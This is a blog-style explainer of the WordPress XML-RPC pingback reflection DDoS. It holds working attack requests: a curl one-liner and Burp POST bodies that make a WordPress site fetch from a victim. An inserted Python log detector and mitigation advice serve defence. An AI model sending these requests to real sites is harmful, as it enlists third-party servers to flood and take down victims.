XML-RPC DDOS – All things in moderation

XML-RPC DDOS

In computing, a denial-of-service (DoS) attack is an attempt to make a machine or network resource unavailable to its intended users, such as to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled. (Wikipedia)

[Image XML_RPC_DDOS1: DOS Attack]

In a DoS attack the attacker uses his own computer to send a stream of packets directly to the victim's machine. Typical examples are SYN floods and UDP and DNS amplification attacks.

Unlike a DoS attack, a DDoS attack has the attacker take advantage of other machines, known as zombie computers, to attack the victim. This makes the attack far more serious than a plain DoS attack, and it also makes the real attacker much harder to identify.

[Image XML_RPC_DDOS2: DDOS Attack]

What is XML-RPC?
It’s a spec and a set of implementations that allow software running on disparate operating systems, running in different environments to make procedure calls over the Internet.

It’s remote procedure calling using HTTP as the transport and XML as the encoding. XML-RPC is designed to be as simple as possible, while allowing complex data structures to be transmitted, processed and returned.

In WordPress, the XML-RPC interface allows the site to be called remotely over HTTP. The same interface is also used for trackbacks and pingbacks, which let your website notify and link to other interesting sites.

We can understand the attack process simply as follows:
The attacker simultaneously sends requests to the zombie websites with the instruction "the post you need is located on the victim" (the pingback mechanism).
On receiving such a request, the zombie websites all connect to the victim at once to fetch the resource. With a large enough number of zombies, this brings the victim down.

[Image XML_RPC_DDOS4]

[Image XML_RPC_DDOS3]

By abusing this seemingly harmless function, an attacker can make other websites send thousands of requests to the victim until it goes down.

74.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://www.xxxcloud.com"
121.127.254.2 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-" "WordPress/3.4.2;http://www.zycfly.com" 
217.160.253.21 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8.1; http://www.ysbitan.com" 
193.197.34.216 - - [09/Mar/2014:11:05:27 -0400] "GET /?3162504=9747583 HTTP/1.0" 403 0 "-" "WordPress/2.9.2; http://www.ddwz8.net" 
..

All queries carry random values to bypass any cache in front of the site and force it to render one full page for every request. This takes the victim down faster. It is interesting that all of the requests are sent from valid, legitimate sites.
Every WordPress site that has this feature enabled unwittingly becomes part of a giant botnet.
The attack is easy to carry out from the Linux command line:

$ curl -D - "www.anywordpresssite.com/xmlrpc.php" -d '<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://victim.com</string></value></param><param><value><string>www.anywordpresssite.com/postchosen</string></value></param></params></methodCall>'
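As an added example that is not part of the original post, the following Python detector parses victim-side access-log lines like the ones quoted above and flags a burst of requests that combine a WordPress pingback User-Agent with a random cache-busting query string. The four flood lines in the sample are the ones quoted above; the two benign lines (a legitimate pingback fetch and an ordinary browser request) are constructed.

```python
import re
from collections import Counter

# Combined log format: ip - - [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# User agent WordPress sends when fetching a pingback: "WordPress/<version>; <site url>"
PINGBACK_UA_RE = re.compile(r'^WordPress/[\d.]+;\s*(?P<site>\S+)$')
# Cache-busting request line seen in the flood: "GET /?<digits>=<digits> HTTP/1.x"
RANDOM_QUERY_RE = re.compile(r'^GET /\?\d+=\d+ HTTP/')

# Constructed sample: the four lines quoted in the post plus two benign lines
# (a legitimate pingback fetch of a real post and an ordinary browser request).
SAMPLE_LOG = [
    '74.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://www.xxxcloud.com"',
    '121.127.254.2 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-" "WordPress/3.4.2;http://www.zycfly.com"',
    '217.160.253.21 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8.1; http://www.ysbitan.com"',
    '193.197.34.216 - - [09/Mar/2014:11:05:27 -0400] "GET /?3162504=9747583 HTTP/1.0" 403 0 "-" "WordPress/2.9.2; http://www.ddwz8.net"',
    '198.51.100.7 - - [09/Mar/2014:11:05:28 -0400] "GET /2014/03/a-post/ HTTP/1.0" 200 8120 "-" "WordPress/3.8; http://blog.example"',
    '203.0.113.5 - - [09/Mar/2014:11:05:28 -0400] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def parse_line(line):
    """Split one access-log line into fields, or return None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def is_pingback_flood_request(entry):
    """True when the entry has a WordPress pingback UA and a random-number query."""
    return bool(PINGBACK_UA_RE.match(entry["ua"]) and RANDOM_QUERY_RE.match(entry["req"]))

def detect(lines, per_second_threshold=3):
    """Count flood requests per reflecting site and per second; flag a burst."""
    per_site, per_second = Counter(), Counter()
    for line in lines:
        entry = parse_line(line)
        if entry is None or not is_pingback_flood_request(entry):
            continue
        per_site[PINGBACK_UA_RE.match(entry["ua"]).group("site")] += 1
        per_second[entry["time"]] += 1
    burst = any(n >= per_second_threshold for n in per_second.values())
    return {"burst": burst, "reflectors": dict(per_site), "per_second": dict(per_second)}

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

The sites listed under "reflectors" are not the attacker but other WordPress installs being abused, so the lasting fix is disabling pingback.ping on those sites, while the victim can rate-limit or block this User-Agent plus random-query combination at the edge.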

To determine whether the xmlrpc.php file is enabled, send the request below using the Repeater tab in Burp proxy:

POST /xmlrpc.php HTTP/1.1 
Host: veris.in 
Connection: keep-alive 
Content-Length: 175

<?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>demo.sayHello</methodName> 
<params> 
<param>
<value>admin</value>
</param> 
</params> 
</methodCall>

Notice that a successful response is received, showing that the xmlrpc.php file is enabled.
The xmlrpc.php file discussed above could potentially be abused to cause a DDoS attack against a victim host. This is achieved simply by sending a request like the one below:

POST /xmlrpc.php HTTP/1.1 
Host: veris.in
Connection: keep-alive 
Content-Length: 293

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://victim.com</string></value>
</param>
<param>
<value><string>https://veris.in/anypost</string></value>
</param>
</params>
</methodCall>
